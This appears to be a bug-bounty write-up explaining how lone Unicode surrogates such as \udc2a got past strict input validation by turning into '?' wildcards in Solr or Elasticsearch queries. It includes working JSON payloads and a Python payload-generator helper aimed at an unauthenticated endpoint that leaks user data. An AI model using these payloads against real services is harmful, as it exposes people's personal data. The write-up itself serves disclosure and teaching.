Hello hackers. 👋

TLDR

I was able to bypass strict input validation with lone Unicode surrogates, which some parsers turn into a plain question mark (?).

Probably any lone low or high surrogate will work. I used: \udc2a.

Background

In some databases, wildcard characters can pose a security risk. There was an endpoint that returned a user's data to anyone who knew their birthday, last name and zip code. For some reason, this functionality was unauthenticated.

The body looked like this:

{
  "birthdate": "2000-01-01",
  "lastname": "Doe",
  "zipcode": "1011A"
}

Response:

{
    "email": "john@doe.com",
    "accountNumber": "123456",
    "something": "more"
}

After I found the first bug in this endpoint, they restricted the allowed characters, and the fix was pretty good:

no special characters allowed
no URL encoding allowed
no unicode versions of special characters allowed

Only some Unicode characters were allowed.

The bug

Two months passed after the fix…

I was riding my indoor bike trainer and watching a talk about Unicode normalization bugs when I had a moment of enlightenment: Unicode truncation!

I jumped off my bike and played with the endpoint to trigger an error:

{
  "birthdate": "2000-01-01",
  "lastname": "\uffff",
  "zipcode": "a"
}

Response:

{
    "errors": [{
        "message": "Received 503 status code [...] 
        GET http://internal.api/customers?zipcode=a&birthdate=2000-01-01&lastname=%EF%BF%BF"
    }]
}

Interesting. The error shows that the Unicode character was UTF-8 encoded and percent-encoded before being sent to the internal API (\uffff became %EF%BF%BF). What if I could smuggle in something that reaches the internal API as %3f, the question mark? Is something like that even possible?

I opened the Shazzer website: https://shazzer.co.uk/unicode-table?fromTo=0x2a&highlightsFromTo= and started testing the endpoint manually.

When I reached the Unicode surrogates, I finally bypassed it:
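The encoding step visible in that error can be reproduced locally. This is a minimal Python sketch, assuming the backend does something equivalent to standard UTF-8 percent-encoding; the real implementation behind the endpoint is unknown.

```python
from urllib.parse import quote

# "\uffff" is a single code point. UTF-8 encodes it as the three bytes
# EF BF BF, and percent-encoding turns each byte into a %XX escape.
encoded = quote("\uffff")
print(encoded)  # %EF%BF%BF
```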

{
  "birthdate": "2000-01-01",
  "lastname": "D\udc2a\udc2a",
  "zipcode": "1\udc2a\udc2a\udc2a\udc2a"
}

Explanation:

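It’s not Unicode truncation but something different. A lone surrogate (for example, one from the low surrogate range: https://jrgraphix.net/r/Unicode/DC00-DFFF) is not a valid character on its own and can't be encoded as well-formed UTF-8. Surrogates are meant to be used in UTF-16 as a high and low pair, which is how many emojis are encoded.

All you get when you try to display a lone surrogate is the Unicode replacement character: https://www.compart.com/en/unicode/U+FFFD.

Some parsers apparently go one step further and simplify the replacement character to a question mark (?). That question mark was never in my input, so the validation didn't catch it, but it still reached the internal API. That's what caused the vulnerability.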
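Python's standard library happens to show the same class of behavior, so it makes a convenient local demo. This is only a sketch of how a lossy encoder can produce a question mark; it is an assumption that the target did something similar, and the actual parser involved is unknown.

```python
import json
from urllib.parse import quote

# The JSON body carries the surrogates as \uXXXX escapes.
body = '{"lastname": "D\\udc2a\\udc2a"}'
lastname = json.loads(body)["lastname"]

# The parsed value contains no literal question mark, so a filter
# that blocks "?" has nothing to reject.
has_question_mark = "?" in lastname

# Strict UTF-8 encoding refuses lone surrogates...
try:
    lastname.encode("utf-8")
    strict_ok = True
except UnicodeEncodeError:
    strict_ok = False

# ...but a lossy encoder substitutes "?" for each one.
lossy = quote(lastname, errors="replace")

print(has_question_mark, strict_ok, lossy)  # False False D%3F%3F
```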

From what I know, I would name 2 databases where “?” can be used as a wildcard that matches a single character:

Solr
Elasticsearch
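To see why the payload matched the example record, here is a small sketch that uses Python's fnmatch module purely as a stand-in for single-character wildcard matching. It is not the Solr or Elasticsearch query engine, only an illustration of what "D??" and "1????" match once the surrogates have become question marks.

```python
from fnmatch import fnmatchcase

# Each "?" matches exactly one character.
lastname_hit = fnmatchcase("Doe", "D??")
zipcode_hit = fnmatchcase("1011A", "1????")

# A longer last name does not match the three-character pattern.
lastname_miss = fnmatchcase("Doyle", "D??")

print(lastname_hit, zipcode_hit, lastname_miss)  # True True False
```

So an attacker only needs to guess the first character and the length of each field instead of the full value.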

Takeaways:

test for wildcards - there are plenty of them in various DBs
if the question mark is blocked and you need it in your chain - try lone Unicode surrogates

Although the bug was related to database systems, I believe this trick can be useful in more places.
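For testing, a request body like the one I used can be generated with a few lines of Python. This is a rough sketch: the helper name wildcard_value and the field values are hypothetical, so adjust them to your target.

```python
import json

LONE_SURROGATE = "\udc2a"  # the surrogate used in this write-up


def wildcard_value(known_prefix: str, total_length: int) -> str:
    """Pad a known prefix with lone surrogates up to total_length characters."""
    padding = max(total_length - len(known_prefix), 0)
    return known_prefix + LONE_SURROGATE * padding


payload = {
    "birthdate": "2000-01-01",
    "lastname": wildcard_value("D", 3),
    "zipcode": wildcard_value("1", 5),
}

# ensure_ascii=True (the default) writes each surrogate as a \uXXXX
# escape, so the request body itself stays plain ASCII.
body = json.dumps(payload)
print(body)
```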

Good luck! Happy hacking.